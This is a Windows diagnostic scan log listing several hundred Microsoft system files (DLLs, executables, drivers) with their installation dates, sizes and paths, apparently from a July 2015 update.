2015-07-16 11:51 - 2014-11-09 22:29 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSetupStatusProvider.dll
2015-07-16 11:51 - 2014-11-09 21:51 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceSetupStatusProvider.dll
2015-07-16 11:50 - 2015-07-09 15:51 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2015-07-16 11:50 - 2015-07-09 14:40 - 00359936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
2015-07-16 11:50 - 2015-07-09 12:03 - 03701760 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2015-07-16 11:50 - 2015-07-09 11:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2015-07-16 11:50 - 2015-07-09 11:53 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2015-07-16 11:50 - 2015-07-09 11:50 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2015-07-16 11:50 - 2015-07-09 11:50 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2015-07-16 11:50 - 2015-07-09 11:48 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2015-07-16 11:50 - 2015-07-09 11:46 - 02229248 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2015-07-16 11:50 - 2015-07-09 11:38 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2015-07-16 11:50 - 2015-07-09 11:37 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2015-07-16 11:50 - 2015-07-09 11:35 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2015-07-16 11:50 - 2015-07-09 11:34 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2015-07-16 11:50 - 2015-06-26 23:08 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2015-07-16 11:50 - 2015-06-26 23:08 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2015-07-16 11:50 - 2015-06-26 22:14 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2015-07-16 11:42 - 2015-05-07 13:50 - 22292672 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2015-07-16 11:42 - 2015-05-07 13:00 - 03109376 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2015-07-16 11:42 - 2015-05-07 12:53 - 19734960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2015-07-16 11:42 - 2015-05-07 12:12 - 02706432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2015-07-16 11:42 - 2015-03-14 04:20 - 01385256 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2015-07-16 11:42 - 2015-03-14 04:13 - 01124352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2015-07-16 11:42 - 2014-12-08 23:45 - 00393728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scesrv.dll
2015-07-16 11:42 - 2014-12-08 21:56 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\scesrv.dll
2015-07-16 11:36 - 2015-04-24 22:34 - 00653824 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2015-07-16 11:36 - 2015-04-24 22:33 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2015-07-16 11:36 - 2015-04-09 21:00 - 01996800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2015-07-16 11:36 - 2015-04-09 20:50 - 01387008 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2015-07-16 11:36 - 2015-04-09 20:26 - 01560576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2015-07-16 11:35 - 2015-03-23 17:59 - 07476032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-07-16 11:35 - 2015-03-23 17:59 - 01733952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-07-16 11:35 - 2015-03-23 17:59 - 00360480 _____ (Microsoft Corporation) C:\WINDOWS\system32\sechost.dll
2015-07-16 11:35 - 2015-03-23 17:58 - 01498872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-07-16 11:35 - 2015-03-23 17:45 - 00257216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sechost.dll
2015-07-16 11:35 - 2015-03-20 00:12 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2015-07-16 11:35 - 2015-03-20 00:10 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
2015-07-16 11:35 - 2015-03-20 00:10 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
2015-07-16 11:35 - 2015-03-19 23:17 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\tracerpt.exe
2015-07-16 11:35 - 2015-03-19 22:41 - 00369152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tracerpt.exe
2015-07-16 11:35 - 2015-03-19 22:40 - 00950784 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2015-07-16 11:35 - 2015-03-19 22:16 - 00749568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2015-07-16 11:35 - 2014-10-28 21:57 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
2015-07-16 11:35 - 2014-10-28 21:15 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
2015-07-16 11:35 - 2014-10-28 21:15 - 00005632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
2015-07-16 11:35 - 2014-10-28 21:14 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
2015-07-16 11:35 - 2014-10-28 21:13 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
2015-07-16 11:35 - 2014-10-28 21:13 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
2015-07-16 11:34 - 2015-02-02 20:03 - 03551744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2015-07-16 11:34 - 2015-02-02 20:02 - 04298240 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2015-07-16 11:34 - 2015-01-29 22:03 - 01488896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42u.dll
2015-07-16 11:34 - 2015-01-29 22:03 - 01464832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42.dll
2015-07-16 11:34 - 2015-01-29 21:44 - 01230336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42u.dll
2015-07-16 11:34 - 2015-01-29 21:42 - 01204224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42.dll
2015-07-16 11:34 - 2014-06-09 18:13 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2015-07-16 11:34 - 2014-06-09 18:13 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2015-07-16 11:33 - 2015-05-03 11:09 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-07-16 11:33 - 2015-05-03 10:58 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2015-07-16 11:33 - 2015-05-03 10:55 - 00971776 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSShared.dll
2015-07-16 11:33 - 2015-05-03 10:49 - 00811008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSShared.dll
2015-07-16 11:33 - 2015-03-05 22:47 - 01696256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2015-07-16 11:33 - 2015-02-17 19:19 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapisrv.dll
2015-07-16 11:33 - 2015-01-27 22:24 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageContextHandler.dll
2015-07-16 11:33 - 2015-01-27 21:47 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StorageContextHandler.dll
2015-07-16 11:17 - 2015-01-30 19:20 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2015-07-16 11:17 - 2015-01-27 00:22 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2015-07-16 11:17 - 2015-01-26 22:11 - 03547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2015-07-16 11:16 - 2015-03-13 21:51 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wu.upgrade.ps.dll
2015-07-16 11:16 - 2015-03-13 20:09 - 00200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2015-07-16 11:16 - 2014-10-18 02:50 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaext.dll
2015-07-16 11:16 - 2014-07-23 23:20 - 00875688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll
2015-07-16 11:16 - 2014-07-23 23:20 - 00869544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll
2015-07-16 11:15 - 2015-05-11 12:34 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcpl.dll
2015-07-16 11:15 - 2015-05-07 12:47 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\apphelp.dll
2015-07-16 11:15 - 2015-03-10 21:49 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdbinst.exe
2015-07-16 11:15 - 2015-03-10 21:09 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sdbinst.exe
2015-07-16 11:14 - 2015-05-12 09:19 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemEventsBrokerServer.dll
2015-07-16 11:14 - 2015-05-03 11:07 - 07784448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2015-07-16 11:14 - 2015-05-03 10:57 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2015-07-16 11:14 - 2015-05-01 19:33 - 00410739 _____ C:\WINDOWS\system32\ApnDatabase.xml
2015-07-16 11:10 - 2015-04-29 19:22 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2015-07-16 11:10 - 2015-01-26 23:44 - 00933888 _____ (Microsoft Corporation) C:\WINDOWS\system32\calc.exe
2015-07-16 11:10 - 2015-01-23 21:51 - 00816128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\calc.exe
2015-07-16 11:09 - 2014-10-30 19:39 - 01970432 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2015-07-16 11:09 - 2014-10-30 19:38 - 01612992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2015-07-16 11:03 - 2015-03-17 13:26 - 00467776 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2015-07-16 10:57 - 2015-06-24 22:31 - 04177920 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2015-07-16 10:57 - 2015-06-15 18:41 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
2015-07-16 10:57 - 2015-06-15 18:24 - 03320320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2015-07-16 10:57 - 2015-06-15 17:16 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
2015-07-16 10:57 - 2015-06-15 17:09 - 03607552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2015-07-16 10:57 - 2015-06-15 16:50 - 02774528 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2015-07-16 10:57 - 2015-06-15 15:57 - 02460160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2015-07-16 10:57 - 2015-01-23 03:17 - 00723072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2015-07-16 10:57 - 2015-01-23 01:02 - 00560392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2015-07-16 10:54 - 2015-01-28 21:58 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\photowiz.dll
2015-07-16 10:54 - 2015-01-28 21:29 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\photowiz.dll
2015-07-16 10:50 - 2015-04-30 19:05 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2015-07-16 10:50 - 2015-04-30 18:48 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2015-07-16 10:37 - 2015-03-19 21:56 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ahcache.sys
2015-07-16 10:36 - 2015-03-19 23:49 - 00309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\compstui.dll
2015-07-16 10:36 - 2015-03-19 23:08 - 00477184 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2015-07-16 10:36 - 2015-03-19 22:37 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiobj.dll
2015-07-16 10:36 - 2015-03-19 22:07 - 01091072 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2015-07-16 10:36 - 2015-01-28 21:04 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2015-07-16 10:31 - 2015-03-03 21:32 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2015-07-16 10:31 - 2015-03-03 21:12 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2015-07-16 10:30 - 2015-03-01 21:43 - 00222208 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastapi.dll
2015-07-16 10:30 - 2015-03-01 21:21 - 00207872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastapi.dll
2015-07-16 10:30 - 2015-01-29 20:53 - 02819584 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers.dll
2015-07-16 10:30 - 2014-11-14 02:58 - 00116736 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsDatabase.dll
2015-07-16 10:16 - 2015-04-01 18:22 - 02985984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2015-07-16 10:16 - 2015-04-01 18:20 - 04417536 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2015-07-16 10:16 - 2015-03-31 23:45 - 01491456 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2015-07-16 10:16 - 2015-03-31 22:31 - 01207296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2015-07-16 10:16 - 2015-03-12 21:11 - 02162176 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2015-07-16 10:16 - 2015-03-12 20:39 - 01812992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2015-07-16 10:16 - 2015-02-05 16:24 - 01113920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2015-07-16 10:16 - 2015-01-29 23:01 - 00097792 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbth.sys
2015-07-16 10:16 - 2015-01-29 22:02 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll
2015-07-16 10:16 - 2015-01-29 21:40 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll
2015-07-16 10:16 - 2015-01-29 21:37 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll
2015-07-16 10:16 - 2015-01-29 21:29 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\atlthunk.dll
2015-07-16 10:16 - 2015-01-29 21:24 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll
2015-07-16 10:16 - 2015-01-29 21:24 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll
2015-07-16 10:16 - 2015-01-29 21:16 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll
2015-07-16 10:16 - 2015-01-29 21:08 - 00346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll
2015-07-16 10:16 - 2015-01-29 21:06 - 00278016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll
2015-07-16 10:16 - 2014-12-11 22:04 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWbPrxy.exe
2015-07-16 10:16 - 2014-12-05 23:17 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2015-07-16 10:16 - 2014-12-05 21:41 - 00391680 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2015-07-16 10:14 - 2015-03-12 22:02 - 00316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\udfs.sys
2015-07-16 10:14 - 2014-11-04 15:25 - 00059712 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdclass.sys
2015-07-16 10:14 - 2014-11-04 15:25 - 00051008 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouclass.sys
2015-07-16 10:14 - 2014-11-04 02:55 - 00026112 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sermouse.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00108544 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\i8042prt.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00032256 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00030208 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouhid.sys
2015-07-16 10:13 - 2015-04-08 18:41 - 00158720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rgb9rast.dll
2015-07-16 10:13 - 2015-04-02 20:35 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoMetadataHandler.dll
2015-07-16 10:13 - 2015-04-02 20:14 - 00364544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoMetadataHandler.dll
2015-07-16 10:10 - 2015-06-29 18:43 - 00026288 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2015-07-16 10:10 - 2015-06-29 11:07 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2015-07-16 10:10 - 2015-06-26 19:21 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2015-07-16 10:10 - 2015-06-26 19:21 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepdu.dll
2015-07-16 10:10 - 2015-05-21 09:08 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2015-07-16 10:09 - 2015-04-08 18:55 - 00410128 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2015-07-16 10:09 - 2014-12-19 02:26 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2015-07-16 10:08 - 2015-03-12 22:58 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\pku2u.dll
2015-07-16 10:08 - 2015-03-12 22:37 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pku2u.dll
2015-07-16 10:08 - 2015-01-19 14:42 - 01487976 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2015-07-16 09:54 - 2015-04-09 20:40 - 01249280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2015-07-16 09:54 - 2015-04-09 20:17 - 01018880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2015-07-16 09:44 - 2015-04-16 02:17 - 00325464 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2015-07-16 09:37 - 2015-06-10 23:49 - 01380600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2015-07-16 09:37 - 2015-06-10 12:13 - 01097216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2015-07-16 09:37 - 2015-04-01 00:21 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2015-07-16 09:37 - 2015-04-01 00:18 - 00468480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2015-07-16 09:37 - 2015-04-01 00:17 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssphtb.dll
2015-07-16 09:37 - 2015-04-01 00:08 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2015-07-16 09:37 - 2015-03-31 23:46 - 03633664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2015-07-16 09:37 - 2015-03-31 23:17 - 02551808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2015-07-16 09:37 - 2015-03-31 23:17 - 00903168 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2015-07-16 09:37 - 2015-03-31 22:53 - 00391680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2015-07-16 09:37 - 2015-03-31 22:53 - 00272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2015-07-16 09:37 - 2015-03-31 22:45 - 02749952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2015-07-16 09:37 - 2015-03-31 22:45 - 00699392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2015-07-16 09:37 - 2015-03-31 22:14 - 01920000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2015-07-16 09:37 - 2015-03-31 22:12 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2015-07-16 09:37 - 2015-02-24 04:32 - 00991552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2015-07-16 09:37 - 2015-01-29 14:45 - 01763352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2015-07-16 09:37 - 2015-01-29 14:34 - 01488040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2015-07-16 09:37 - 2014-12-11 01:36 - 00046456 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockScreenContentServer.exe
2015-07-16 09:36 - 2015-06-16 01:36 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2015-07-16 09:36 - 2015-06-16 01:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2015-07-16 09:36 - 2015-04-28 09:13 - 00513480 _____ C:\WINDOWS\SysWOW64\locale.nls
2015-07-16 09:36 - 2015-04-28 09:13 - 00513480 _____ C:\WINDOWS\system32\locale.nls
2015-07-16 09:36 - 2015-04-23 11:47 - 03084288 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2015-07-16 09:36 - 2015-04-23 11:16 - 02471424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2015-07-16 09:36 - 2015-03-05 23:08 - 02067968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpdshext.dll
2015-07-16 09:36 - 2015-03-05 22:43 - 01969664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpdshext.dll
2015-07-16 09:36 - 2015-03-04 06:25 - 00377152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2015-07-16 09:36 - 2015-03-03 23:04 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clfsw32.dll
2015-07-16 09:36 - 2015-03-03 22:19 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clfsw32.dll
2015-07-16 09:36 - 2015-02-07 19:57 - 01090048 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2015-07-16 09:36 - 2015-02-07 19:49 - 00791040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2015-07-16 09:36 - 2015-01-27 21:31 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2015-07-16 09:36 - 2015-01-27 21:11 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2015-07-16 09:35 - 2015-01-27 19:47 - 02501368 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2015-07-16 09:35 - 2015-01-27 19:41 - 02207488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2015-07-16 08:42 - 2015-06-28 01:07 - 00442712 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2015-07-16 08:42 - 2015-06-28 01:07 - 00178008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2015-07-16 08:42 - 2015-06-28 01:06 - 01311960 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2015-07-16 08:42 - 2015-06-28 01:06 - 00332120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2015-07-16 08:42 - 2015-06-27 12:42 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2015-07-16 08:42 - 2015-06-26 23:13 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2015-07-16 08:42 - 2015-06-26 23:12 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2015-07-16 08:42 - 2015-06-26 23:12 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2015-07-16 08:42 - 2015-06-26 22:40 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2015-07-16 08:42 - 2015-06-26 22:05 - 01441792 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2015-07-16 08:42 - 2015-06-26 22:00 - 00989184 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2015-07-16 08:42 - 2015-06-26 21:53 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2015-07-16 08:42 - 2015-06-26 21:26 - 00802816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2015-07-16 08:42 - 2015-03-30 01:47 - 00561928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2015-07-16 08:41 - 2015-05-30 17:18 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
2015-07-16 08:41 - 2015-05-30 15:36 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2015-07-16 08:41 - 2015-05-30 15:35 - 00911360 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2015-07-16 08:41 - 2015-03-08 22:02 - 00057856 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2015-07-16 08:41 - 2014-12-19 04:57 - 00788680 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2015-07-16 08:41 - 2014-12-19 04:25 - 00602776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00535640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00531616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00448792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00413248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00372408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00108944 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDump.dll
